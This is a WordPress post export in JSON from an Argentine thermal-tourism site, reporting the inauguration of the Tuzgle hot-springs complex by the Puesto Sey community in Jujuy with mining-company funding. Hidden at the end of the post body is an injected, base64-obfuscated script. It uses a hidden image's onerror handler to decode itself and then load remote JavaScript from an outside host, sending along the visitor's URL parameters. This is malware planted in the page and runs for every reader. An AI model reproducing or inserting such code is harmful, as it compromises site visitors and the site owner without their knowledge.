{"id":7738,"date":"2023-12-26T19:07:53","date_gmt":"2023-12-26T22:07:53","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=7738"},"modified":"2025-08-13T15:49:25","modified_gmt":"2025-08-13T18:49:25","slug":"la-comunidad-de-puesto-sey-y-sus-termas-de-tuzgle-en-la-provincia-de-jujuy","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=7738","title":{"rendered":"La comunidad de Puesto Sey y sus termas de Tuzgle en la provincia de Jujuy"},"content":{"rendered":"<div class=\"wp-block-image\">\n<figure class=\"alignright size-full\"><a href=\"https:\/\/www.somosjujuy.com.ar\/jujuy-ahora\/la-comunidad-puesto-sey-inauguro-complejo-termal-tuzgle-n46961\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" width=\"238\" height=\"47\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/12\/Captura-web_26-12-2023_185742_www.somosjujuy.com_.ar_.jpeg\" alt=\"\" class=\"wp-image-7739\" \/><\/a><figcaption class=\"wp-element-caption\"><em>Fuente<\/em><\/figcaption><\/figure>\n<\/div>\n\n\n<h4 class=\"wp-block-heading has-white-color has-black-background-color has-text-color has-background\"><em>Una obra que se consolido all\u00e1 por el a\u00f1o 2021 con el acompa\u00f1amiento y el aporte econ\u00f3mico de Minera Exar, las empresas operadoras del grupo Orocobre en la zona y el Gobierno de la provincia.<\/em><\/h4>\n\n\n\n<p>En una emotiva ceremonia, en donde se rindi\u00f3 culto a la Pachamama, participaron el Comunero de Puesto Sey, Oscar Alejo; el Gerente de Recursos Humanos y Relaciones Comunitarias de Minera Exar, Marcelo Ochoa, la Gerente de Valor Compartido de Sales de Jujuy, Paola Piu; el Comisionado Municipal de Susques, Santiago Maman\u00ed; y la representante de la Secretar\u00eda de Turismo de la Provincia, Sandra Olmos; como tambi\u00e9n residentes de la comunidad y alrededores y una delegaci\u00f3n de turistas, que tuvo la posibilidad de disfrutar del primer ba\u00f1o en la piscina termal.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/12\/R.jpg\"><img decoding=\"async\" width=\"1024\" height=\"646\" data-id=\"7742\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/12\/R-1024x646.jpg\" alt=\"\" class=\"wp-image-7742\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/12\/R-1024x646.jpg 1024w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/12\/R-300x189.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/12\/R-768x484.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/12\/R-696x439.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/12\/R-666x420.jpg 666w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/12\/R-320x202.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/12\/R-480x303.jpg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/12\/R-800x504.jpg 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/12\/R.jpg 1053w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/12\/complejo-tuzgle-1-medium-size.jpg\"><img decoding=\"async\" width=\"960\" height=\"544\" data-id=\"7741\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/12\/complejo-tuzgle-1-medium-size.jpg\" alt=\"\" class=\"wp-image-7741\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/12\/complejo-tuzgle-1-medium-size.jpg 960w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/12\/complejo-tuzgle-1-medium-size-300x170.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/12\/complejo-tuzgle-1-medium-size-768x435.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/12\/complejo-tuzgle-1-medium-size-696x394.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/12\/complejo-tuzgle-1-medium-size-741x420.jpg 741w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/12\/complejo-tuzgle-1-medium-size-320x181.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/12\/complejo-tuzgle-1-medium-size-480x272.jpg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/12\/complejo-tuzgle-1-medium-size-800x453.jpg 800w\" sizes=\"(max-width: 960px) 100vw, 960px\" \/><\/a><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/12\/OIP.jpg\"><img decoding=\"async\" width=\"474\" height=\"266\" data-id=\"7740\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/12\/OIP.jpg\" alt=\"\" class=\"wp-image-7740\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/12\/OIP.jpg 474w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/12\/OIP-300x168.jpg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/12\/OIP-320x180.jpg 320w\" sizes=\"(max-width: 474px) 100vw, 474px\" \/><\/a><\/figure>\n<\/figure>\n\n\n\n<p>Con esta obra se logra cumplir con un objetivo muy importante como es contar con una infraestructura \u00fanica, enmarcada en un paisaje imponente para desarrollar turismo sustentable en la zona. En este sentido, fue vital el aporte de Minera Exar que se comprometi\u00f3 con el desarrollo desde su planificaci\u00f3n inicial, desde que era un sue\u00f1o. Colabor\u00f3 con la donaci\u00f3n de cemento y el container para la administraci\u00f3n. En tanto, la comunidad hizo uso de parte del Fondo para el Desarrollo de las Comunidades (aporte de Minera Exar en 2020 a las comunidades de la zona, como paliativo a la dura situaci\u00f3n generada por la Pandemia) que se gestionaron desde el Ministerio de Desarrollo Social de la provincia. Desde el grupo Orocobre, el \u00e1rea de Valor Compartido de Sales de Jujuy,se encarg\u00f3 de aportar los vidrios para el complejo. El resto de la gesti\u00f3n, acarreo de materiales y mano de obra fue por parte de la Comisi\u00f3n Municipal de Susques. As\u00ed, de manera mancomunada, se concret\u00f3 el sue\u00f1o.<\/p>\n\n\n\n<p>Pero para generar una actividad tur\u00edstica que se sostenga en el tiempo, es fundamental tambi\u00e9n contar con gente capacitada para llevarla adelante. En \u00e9ste sentido Minera Exar colabor\u00f3 tambi\u00e9n con el aporte de un capacitador experto en turismo rural sostenible, Ram\u00f3n Serapio. Como etapa inicial, se prepar\u00f3 a 15 mujeres que estar\u00e1n a cargo de la atenci\u00f3n en el Complejo, en una actividad de perfeccionamiento que continuar\u00e1 todo el a\u00f1o. Serapio tambi\u00e9n capacita en la elaboraci\u00f3n de comidas regionales con orientaci\u00f3n para recepci\u00f3n tur\u00edstica: en esta ocasi\u00f3n se brindaron empanadas de carne de llama, chicharr\u00f3n con mote, sopa y anchi.<\/p>\n\n\n\n<p>Agosto es una fecha de conmemoraci\u00f3n a la madre tierra, por lo que se realiz\u00f3 el ritual a la Pachamama pidiendo buenos augurios para esta gran etapa que se comienza a transitar.<\/p>\n\n\n\n<p>\u00d3scar Alejo, Comunero de Puesto Sey tambi\u00e9n se mostr\u00f3 emocionado por el logro de \u00e9ste proyecto que pudo concretarse, \u201cquer\u00edas agradecerles, s\u00e9 que es muy dif\u00edcil llegar hasta ac\u00e1 pero yo considero que vale la pena. \u00c9ste proyecto fue iniciado hace dos a\u00f1os con el sue\u00f1o de todos los pobladores y la verdad que al verlo ahora terminado emociona bastante, cost\u00f3 mucho trabajo, contento de que est\u00e9n ac\u00e1. Invitamos a todos a promocionar la Puna y a apoyar a las comunidades\u201d.<\/p>\n\n\n\n<p>Por parte de Minera Exar, Marcelo Ochoa, Gerente de Recursos Humanos y Relaciones Comunitarias expres\u00f3 su emoci\u00f3n por el trabajo realizado en esta gran obra y agradeci\u00f3 a todos los presentes por acompa\u00f1ar y en especial a la comunidad de Puesto Sey.<\/p>\n\n\n\n<p>En representaci\u00f3n de la Secretar\u00eda de Turismo estuvo Sandra Olmos quien dio las gracias por la invitaci\u00f3n y el recibimiento a todo el pueblo de Puesto Sey, \u201c\u00e9sta obra es un hito, un antes y un despu\u00e9s para el turismo y para el pueblo de Puesto Sey\u201d expresaba. En este sentido remarc\u00f3 la importancia del Turismo Rural Comunitario en la Puna.<\/p>\n\n\n\n<p>Este trabajo da cuenta de la interacci\u00f3n entre las instituciones, abre un abanico de posibilidades laborales para los oriundos de la Puna y, lo m\u00e1s valioso, es que podr\u00e1n hacerlo a partir de sus conocimientos culturales como principal herramienta para la atracci\u00f3n del turismo.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/www.somosjujuy.com.ar\/jujuy-ahora\/la-comunidad-puesto-sey-inauguro-complejo-termal-tuzgle-n46961\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" width=\"238\" height=\"47\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2023\/12\/Captura-web_26-12-2023_185742_www.somosjujuy.com_.ar_.jpeg\" alt=\"\" class=\"wp-image-7739\" \/><\/a><figcaption class=\"wp-element-caption\">Fuente: <\/figcaption><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Una obra que se consolido all\u00e1 por el a\u00f1o 2021 con el acompa\u00f1amiento y el aporte econ\u00f3mico de Minera Exar, las empresas operadoras del grupo Orocobre en la zona y el Gobierno de la provincia. En una emotiva ceremonia, en donde se rindi\u00f3 culto a la Pachamama, participaron el Comunero de Puesto Sey, Oscar Alejo; [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":7740,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[8],"tags":[],"class_list":["post-7738","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-noa"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7738","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=7738"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7738\/revisions"}],"predecessor-version":[{"id":10245,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/7738\/revisions\/10245"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/7740"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=7738"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=7738"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=7738"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}